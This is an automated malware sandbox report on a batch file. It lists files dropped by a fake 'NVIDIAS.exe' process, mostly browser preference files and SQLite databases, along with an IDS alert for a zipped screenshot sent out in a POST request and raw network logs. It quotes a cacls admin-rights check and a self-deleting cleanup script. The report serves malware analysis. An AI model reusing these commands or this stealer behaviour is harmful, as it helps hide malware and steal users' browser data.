                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):15119
                                                                    Entropy (8bit):5.63468773874796
                                                                    Encrypted:false
                                                                    SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                    MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                    SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                    SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                    SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                    Malicious:false
                                                                    Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08231524779339361
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:886A5F9308577FDF19279AA582D0024D
                                                                    SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                    SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                    SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):294912
                                                                    Entropy (8bit):0.08434615749937499
                                                                    Encrypted:false
                                                                    SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                                                    MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                                                    SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                                                    SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                                                    SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):0.7310370201569906
                                                                    Encrypted:false
                                                                    SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                    MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                    SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                    SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                    SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1414673161713362
                                                                    Encrypted:false
                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1414673161713362
                                                                    Encrypted:false
                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):122880
                                                                    Entropy (8bit):1.1414673161713362
                                                                    Encrypted:false
                                                                    SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                    MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                    SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                    SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                    SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                    Category:dropped
                                                                    Size (bytes):135168
                                                                    Entropy (8bit):1.0873605234887023
                                                                    Encrypted:false
                                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.86528072116055
                                                                    Encrypted:false
                                                                    SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                                    MD5:8CC409C8658C3F05143C1484A1719879
                                                                    SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                                    SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                                    SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                    Category:dropped
                                                                    Size (bytes):135168
                                                                    Entropy (8bit):1.0873605234887023
                                                                    Encrypted:false
                                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                    Category:dropped
                                                                    Size (bytes):135168
                                                                    Entropy (8bit):1.0873605234887023
                                                                    Encrypted:false
                                                                    SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                    MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                    SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                    SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                    SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.4026573159402624
                                                                    Encrypted:false
                                                                    SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                    MD5:F49DFF163167A43F4940B7337A092C07
                                                                    SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                    SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                    SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):98
                                                                    Entropy (8bit):5.152490650406136
                                                                    Encrypted:false
                                                                    SSDEEP:3:HFTEOuMJcFKsoR9lwBRZDEXEdZkREIk2JSn:yOuMJNR9lwelVk/n
                                                                    MD5:355A21B3771C443913048200B4BA6095
                                                                    SHA1:BAAA3AA106AA4FD61D7A4C24296C3F8BA48AEDF6
                                                                    SHA-256:059B7FB7524CDE4226296B360E370E8F7E7EE69EA4A48566778EB50361068A5B
                                                                    SHA-512:0362613FEAE10EE93EDF3AB02CB85F147572FCB48034FC1156F6B18CB19103C674530E8AAA4232A208DC6223566704C822CFBB191A401CC8159E7B277BE7B70E
                                                                    Malicious:false
                                                                    Preview:chcp 65001..TaskKill /F /IM 716..Timeout /T 2 /Nobreak..Del /ah "C:\ProgramData\QQQ\NVIDIAS.exe"..
                                                                    Process:C:\ProgramData\QQQ\NVIDIAS.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):103985
                                                                    Entropy (8bit):6.082865991437579
                                                                    Encrypted:false
                                                                    SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                                                    MD5:6DE273C47E7F54F2910BC516F886633B
                                                                    SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                                                    SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                                                    SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                                                    Malicious:false
                                                                    Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):2359296
                                                                    Entropy (8bit):4.361341472416165
                                                                    Encrypted:false
                                                                    SSDEEP:49152:taAhNXBlw3Ak2BGUi5Dj0Uag6nSz8a8aO:O
                                                                    MD5:C6A628A070158FB046C791AB75883B2C
                                                                    SHA1:7637211ADD65BC65476A25664D54CC73685D687E
                                                                    SHA-256:971C27E1A598D579F59F2589323EF59028B694BC5EF02724BC3B45BBF626A780
                                                                    SHA-512:84D15BAA4CC4FD6ED004A7976B5AAE608A6396E0481618CBF18BF48B8027AA310CEB12BE45600D6014EC2A9282AC80CBAD25A9FCE52ACB4AA613E0044A4A23F0
                                                                    Malicious:false
                                                                    Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..\Q.O..............................................................................................................................................................................................................................................................................................................................................K...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):73728
                                                                    Entropy (8bit):4.640270911877707
                                                                    Encrypted:false
                                                                    SSDEEP:768:GqQyP8n92v+SSPAb6aRlLlPFRyFuiruMsfd8dMwLGYSAi1fRFrsJpyG2gKOrndxQ:NdzV9Iuiru7dRFrsJdNYP4egHf
                                                                    MD5:543C132816F5CD7D2E394CE36C7B5127
                                                                    SHA1:20F664CBED544562464DB22C2A7DE5A63539B3ED
                                                                    SHA-256:4C74B3DC409E292609763ED2B77FDBBAF61FC12CDBD51A467640B106B3FB7F5A
                                                                    SHA-512:6BC2AA4B1AD929360279A6415892369667AA76EA8804DE94791F4B7EAA38614255C81D740F64FB3FE73DCF91F03419D69E1C4B5CAD7BAA199198572538CF00DD
                                                                    Malicious:false
                                                                    Preview:regf........5.#.^................... .....!.....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm..\Q.O..............................................................................................................................................................................................................................................................................................................................................M...HvLE..............!......X.<.?........d......................... .......p...............................P...............................`... ..........................hbin................5.#.^...........nk,....S....... .......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk .....9......(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...
                                                                    Process:C:\Windows\System32\cacls.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):121
                                                                    Entropy (8bit):4.323081947925383
                                                                    Encrypted:false
                                                                    SSDEEP:3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
                                                                    MD5:43B1EC1407EA9C0219A563FFFEEAE780
                                                                    SHA1:C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
                                                                    SHA-256:7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
                                                                    SHA-512:5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
                                                                    Malicious:false
                                                                    Preview:C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....
                                                                    File type:DOS batch file, ASCII text
                                                                    Entropy (8bit):5.449927446489964
                                                                    TrID:
                                                                      File name:3gJQoqWpxb.bat
                                                                      File size:2'254 bytes
                                                                      MD5:3642e29400aac4137d7da517c1a0161b
                                                                      SHA1:b538bfc1dc9903ff5766000219cd91f3cf978299
                                                                      SHA256:d5033dd57b3a239c426396ffd361a81ad4e37848cb05ff5ac47f3e73555a0a56
                                                                      SHA512:d988693b3052a3abe5dd61e8b6937f8df78b335c6533884c383d42d4fd8073cd0b6add131d75816d5e287ae39c41b26a66045a0481105963ffaaba818e5b22a4
                                                                      SSDEEP:48:k7Bt7ODpwIp31pT7UV0eFeFFIFxO951oN44bvuE44phurDnmBclsdtl4:o82I9DT/6ebkx0ai4bvur4phuHNwr4
                                                                      TLSH:8E41331082EA9239C171FE00964E394BE777F24B6066427353E8210DE48314FDF3E9E9
                                                                      File Content Preview:@echo off. IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (.>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system".) ELSE (.>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system".)..if '%errorlevel%' NEQ
                                                                      Icon Hash:9686878b929a9886
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-16T17:30:28.130597+01002843856ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M21192.168.11.204971089.23.100.2331490TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 16, 2024 17:30:15.874180079 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:15.874202967 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:15.874413967 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:15.882610083 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:15.882616997 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.201060057 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.201356888 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:16.204150915 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:16.204157114 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.204348087 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.210202932 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:16.254205942 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.660283089 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.660332918 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.660574913 CET49707443192.168.11.20140.82.113.4
                                                                      Dec 16, 2024 17:30:16.660584927 CET44349707140.82.113.4192.168.11.20
                                                                      Dec 16, 2024 17:30:16.660798073 CET49707443192.168.11.20140.82.113.4
